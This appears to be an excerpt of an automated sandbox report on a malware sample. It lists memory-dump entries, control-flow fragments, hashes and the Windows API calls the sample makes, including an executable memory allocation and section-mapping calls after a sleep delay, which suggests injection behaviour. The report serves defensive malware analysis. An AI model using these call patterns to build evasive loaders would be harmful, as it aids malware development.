                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2037979246.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_djjergw.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                    • String ID:
                                                                                    • API String ID: 4152845823-0
                                                                                    • Opcode ID: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                                                                                    • Instruction ID: c3efed824753038ef125f202698f45fd900918c8f6410fb3a7b527937a7c5fc5
                                                                                    • Opcode Fuzzy Hash: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                                                                                    • Instruction Fuzzy Hash: D811BFB220C204EBEB00AA908C52EAA3754AF05710F248137BA42791F1C57D9A13F75B

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 521 6104e1-61051b call 6107f4 524 610569 521->524 525 61051d-610550 VirtualAlloc call 61056e 521->525 524->524 527 610555-610567 525->527 527->524
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00610532
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2038289843.000000000060D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0060D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_60d000_djjergw.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                    • Instruction ID: 921f8a554a71ccebb4b89bbc5a81b677b2b3d6c348ae118751e02bbc8b1790dd
                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                    • Instruction Fuzzy Hash: 41113F79A00208EFDB01DF98C985E98BBF5AF08350F098094F9489B361D771EA90DF80

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 528 401902-401963 call 4011a4 Sleep call 401426 542 401972-401978 528->542 543 401965-40196d call 401529 528->543 546 40198e 542->546 547 40197f-40198a 542->547 543->542 546->547 548 401991-4019bd call 4011a4 546->548 547->548
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2037979246.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_djjergw.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                    • String ID:
                                                                                    • API String ID: 4152845823-0
                                                                                    • Opcode ID: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                                                                                    • Instruction ID: 207861a3759c1b147de2553678edefd9187cc257709d93c52e233f88d5e7a3be
                                                                                    • Opcode Fuzzy Hash: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                                                                                    • Instruction Fuzzy Hash: B70169F1208209FBEB009A908D61EBA3668AB05760F700133BA13781F5D57C9A53E76B
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2037979246.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_djjergw.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                    • String ID:
                                                                                    • API String ID: 4152845823-0
                                                                                    • Opcode ID: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                                                                                    • Instruction ID: 578df434b3d236032839297bc76fd9486bb072801922ad90ba2380d7086ecf03
                                                                                    • Opcode Fuzzy Hash: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                                                                                    • Instruction Fuzzy Hash: 95F05EB1208209FBEF009F908D61EAA3729AF05710F644137BA52781F5D63CDA53EB1B
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2037979246.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_djjergw.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                    • String ID:
                                                                                    • API String ID: 4152845823-0
                                                                                    • Opcode ID: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                                                                                    • Instruction ID: b5d34a972f1ec939c421f577379ccf4d396b21f1793fd223155277739043cea6
                                                                                    • Opcode Fuzzy Hash: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                                                                                    • Instruction Fuzzy Hash: 5AF05EB1218209FBEB009F908D61EBA3629AF05310F644177BA12781F5C63DDA23E75B
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2037979246.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_djjergw.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                    • String ID:
                                                                                    • API String ID: 4152845823-0
                                                                                    • Opcode ID: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                                                                                    • Instruction ID: c277f467d3f9426b8f9a73765fdcab00a649fd51b95b24d53f0d4f33e3e8ae71
                                                                                    • Opcode Fuzzy Hash: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                                                                                    • Instruction Fuzzy Hash: F7F037B1108209FBDF009F94CD51EAA3729AF09310F644577BA12781F5C63DDA12E72B
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2037979246.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_djjergw.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                    • String ID:
                                                                                    • API String ID: 4152845823-0
                                                                                    • Opcode ID: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                                                                                    • Instruction ID: 30c85490bd3e36b3d7497cee73256dee3cb4488b2b17691bada95d8d1bd3f612
                                                                                    • Opcode Fuzzy Hash: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                                                                                    • Instruction Fuzzy Hash: 33F037B1204205FBDF009F94CD91EAE3629AF05310F644173BA12791F5D67DDA12E75B
                                                                                    APIs
                                                                                    • LocalAlloc.KERNELBASE(00000000,00513D6C,00418A52), ref: 004183C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2038001720.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_40b000_djjergw.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocLocal
                                                                                    • String ID:
                                                                                    • API String ID: 3494564517-0
                                                                                    • Opcode ID: bf7e8b90cc3ff6e39906310c12a02d65c83cdbf560656bc42193d9e9982b9279
                                                                                    • Instruction ID: c2961758425a8787823cb41888b9bba809d6f705acec62bde6717c0d90632542
                                                                                    • Opcode Fuzzy Hash: bf7e8b90cc3ff6e39906310c12a02d65c83cdbf560656bc42193d9e9982b9279
                                                                                    • Instruction Fuzzy Hash: A6B012F0A491009FD7008F54FD64B903FB4F358702F00C065F600C2164EB304908EB10
                                                                                    APIs
                                                                                    • BuildCommDCBA.KERNEL32(00000000,?), ref: 004185E4
                                                                                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004185F6
                                                                                    • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00418631
                                                                                    • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041863F
                                                                                    • OpenJobObjectA.KERNEL32(00000000,00000000,0041A388), ref: 0041864E
                                                                                    • BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418660
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2038001720.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_40b000_djjergw.jbxd
                                                                                    Similarity
                                                                                    • API ID: AvailableBackupBuildCalendarCommEnvironmentFreeInfoMemoryNodeNumaObjectOpenSeekStrings
                                                                                    • String ID: -
                                                                                    • API String ID: 2332831159-2547889144
                                                                                    • Opcode ID: aa3f3e16c2b8ad8159801690ebf91fd77c7334dd12e0fb43f0cb842b769be909
                                                                                    • Instruction ID: dc09c9271f7556c4636e283841371480f1d2e1e0c911847624fe203bcff12d0a
                                                                                    • Opcode Fuzzy Hash: aa3f3e16c2b8ad8159801690ebf91fd77c7334dd12e0fb43f0cb842b769be909
                                                                                    • Instruction Fuzzy Hash: D411F931684304BBEB205FA4AD46BEE7F74EB09B12F214129FA04691C1CFB41E819B5F
                                                                                    APIs
                                                                                    • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00418631
                                                                                    • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041863F
                                                                                    • OpenJobObjectA.KERNEL32(00000000,00000000,0041A388), ref: 0041864E
                                                                                    • BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418660
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2038001720.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_40b000_djjergw.jbxd
                                                                                    Similarity
                                                                                    • API ID: AvailableBackupCalendarInfoMemoryNodeNumaObjectOpenSeek
                                                                                    • String ID: -
                                                                                    • API String ID: 1414951042-2547889144
                                                                                    • Opcode ID: 86776cb80feb8b78d01717bac59e27429fa2b5433d03396783db491f30ffd1ff
                                                                                    • Instruction ID: 3dc4560c4a2b73dc85cfe488574194b755ebb29c5387034dd9c2c55cc5f6870b
                                                                                    • Opcode Fuzzy Hash: 86776cb80feb8b78d01717bac59e27429fa2b5433d03396783db491f30ffd1ff
                                                                                    • Instruction Fuzzy Hash: F7F0C231685304ABDB219F94ED56BD97B60EB09B15F214258FA086E1C0CBB41E81DB8A
                                                                                    APIs
                                                                                    • QueryDosDeviceA.KERNEL32(0041A3A4,?,00000000), ref: 004186C7
                                                                                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004186E2
                                                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 00418705
                                                                                    • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418714
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2038001720.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_40b000_djjergw.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                    • String ID:
                                                                                    • API String ID: 2776817195-0
                                                                                    • Opcode ID: 9a4a35854e1a9fccc17e98839e81a7996436b36a760555773b20b47233558da8
                                                                                    • Instruction ID: 169bd11126e9c70372d5ad919650aca72b348e6cd2082656d0e56df02b6a2308
                                                                                    • Opcode Fuzzy Hash: 9a4a35854e1a9fccc17e98839e81a7996436b36a760555773b20b47233558da8
                                                                                    • Instruction Fuzzy Hash: 2F01D8B0A40204ABD720EB64EC55BD97778EB1C301F00407BFA05A72D0DE745E84CB5D